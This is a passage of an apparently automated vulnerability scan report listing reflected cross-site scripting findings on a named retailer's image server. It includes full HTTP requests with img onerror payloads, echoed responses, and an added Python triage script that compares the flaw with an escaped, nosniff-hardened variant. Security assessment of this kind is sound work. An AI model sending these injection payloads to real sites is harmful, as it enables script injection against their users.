This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/AC_close_05211019ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:48 GMT
Connection: close

Unable to find /pacsun/AC_close_05211019ce4<img src=a onerror=alert(1)>61e2893ba50

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_041911

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58 was submitted in the REST URL parameter 4. This input was echoed as 7e30b<img src=a onerror=alert(1)>83e58811a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_0419117e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:43 GMT
Connection: close

Unable to find /pacsun/FSO_0419117e30b<img src=a onerror=alert(1)>83e58811a58

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f was submitted in the REST URL parameter 4. This input was echoed as d7f10<img src=a onerror=alert(1)>cc5d87d654f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo007d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo007d7f10<img src=a onerror=alert(1)>cc5d87d654f

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572 was submitted in the REST URL parameter 4. This input was echoed as 810a9<img src=a onerror=alert(1)>e15f190e572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo014810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo014810a9<img src=a onerror=alert(1)>e15f190e572

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo015

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0 was submitted in the REST URL parameter 4. This input was echoed as b23f4<img src=a onerror=alert(1)>e609f813fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo015b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:52 GMT
Connection: close

Unable to find /pacsun/brand_logo015b23f4<img src=a onerror=alert(1)>e609f813fa0
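
Every images3.pacsun.com finding in this section reflects the fourth path segment into a text/plain 403 body, so the practical question is not whether the payload comes back (it does, byte for byte) but whether a browser will treat that body as HTML. The following Python is an added triage example and is not part of the original report or of pacsun's or Scene7's code: it rebuilds the 403 from finding 5.12 as reported, builds an assumed hardened variant (the echoed name HTML-escaped and X-Content-Type-Options: nosniff added), and classifies each by whether the raw payload is present and what the declared content type allows. The image name, the payload and the hardened variant are constructed for the example; only the body format and headers follow what the report shows.

```python
import html
from dataclasses import dataclass

# Constructed sample values modelled on finding 5.12 above; not a live capture.
IMAGE_NAME = "brand_logo015"
PAYLOAD = "b23f4<img src=a onerror=alert(1)>e609f813fa0"


def build_error_response(image_name: str, hardened: bool) -> bytes:
    """Build the raw 403 an image server returns for an unknown image name.

    hardened=False reproduces what the report shows: the decoded path segment
    is echoed verbatim into a text/plain body and no nosniff header is sent.
    hardened=True is the assumed fix (not pacsun's or Scene7's actual code):
    HTML-escape the echoed name and add X-Content-Type-Options: nosniff so a
    browser cannot reinterpret the text/plain body as HTML.
    """
    echoed = html.escape(image_name, quote=True) if hardened else image_name
    body = f"Unable to find /pacsun/{echoed}".encode("utf-8")
    lines = [
        "HTTP/1.1 403 Forbidden",
        "Server: Apache-Coyote/1.1",
        "Pragma: no-cache",
        "Content-Type: text/plain",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    if hardened:
        lines.append("X-Content-Type-Options: nosniff")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("utf-8") + body


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


@dataclass
class Verdict:
    reflected_raw: bool   # payload appears byte-for-byte in the body
    html_context: bool    # declared Content-Type is an HTML type
    nosniff: bool         # X-Content-Type-Options: nosniff is present
    rating: str           # confirmed-xss | sniff-dependent | not-exploitable


def triage(raw: bytes, payload: str) -> Verdict:
    """Classify a reflection by what the declared content type lets a browser do."""
    _, headers, body = parse_response(raw)
    reflected_raw = payload.encode("utf-8") in body
    media_type = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    html_context = media_type in ("text/html", "application/xhtml+xml")
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    if not reflected_raw:
        rating = "not-exploitable"   # encoded or stripped: no markup lands
    elif html_context:
        rating = "confirmed-xss"     # raw markup inside an HTML response
    elif nosniff:
        rating = "not-exploitable"   # non-HTML type and sniffing forbidden
    else:
        rating = "sniff-dependent"   # raw markup, but only a sniffing client runs it
    return Verdict(reflected_raw, html_context, nosniff, rating)


if __name__ == "__main__":
    for hardened in (False, True):
        raw = build_error_response(IMAGE_NAME + PAYLOAD, hardened)
        print("hardened" if hardened else "as reported", triage(raw, PAYLOAD))
```

Run stand-alone it prints a sniff-dependent verdict for the response as reported and not-exploitable for the hardened one; the rebuilt body is 80 bytes, matching the Content-Length in 5.12. That is how the Severity: High entries in this section should be read: confirmed only against a client that sniffs text/plain to HTML, which is why the nosniff header, and not output encoding alone, belongs in the fix.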

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as ebcce<img src=a onerror=alert(1)>ff64f941238.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/brand_logo016ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:10 GMT
Connection: close

Unable to find /pacsun/brand_logo016ebcce<img src=a onerror=alert(1)>ff64f941238

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as a0352<img src=a onerror=alert(1)>8835400a2e4.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/brand_logo017a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:58 GMT
Connection: close

Unable to find /pacsun/brand_logo017a0352<img src=a onerror=alert(1)>8835400a2e4

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 9be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 9be63<img src=a onerror=alert(1)>42202058f7c.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/btnASmallV39be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:56 GMT
Connection: close

Unable to find /pacsun/btnASmallV39be63<img src=a onerror=alert(1)>42202058f7c

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 5699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 5699c<img src=a onerror=alert(1)>3d73fa1077f.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/btn_searchGo_v25699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v25699c<img src=a onerror=alert(1)>3d73fa1077f

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_301

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as be627<img src=a onerror=alert(1)>d5f2efe08ae.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/detailLogo_301be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/detailLogo_301be627<img src=a onerror=alert(1)>d5f2efe08ae

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as d8821<img src=a onerror=alert(1)>953892990d2.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/detailLogo_391d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:09 GMT
Connection: close

Unable to find /pacsun/detailLogo_391d8821<img src=a onerror=alert(1)>953892990d2

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 1b809<img src=a onerror=alert(1)>7f5d0e54d25.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/headerEmailV3_envelope1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
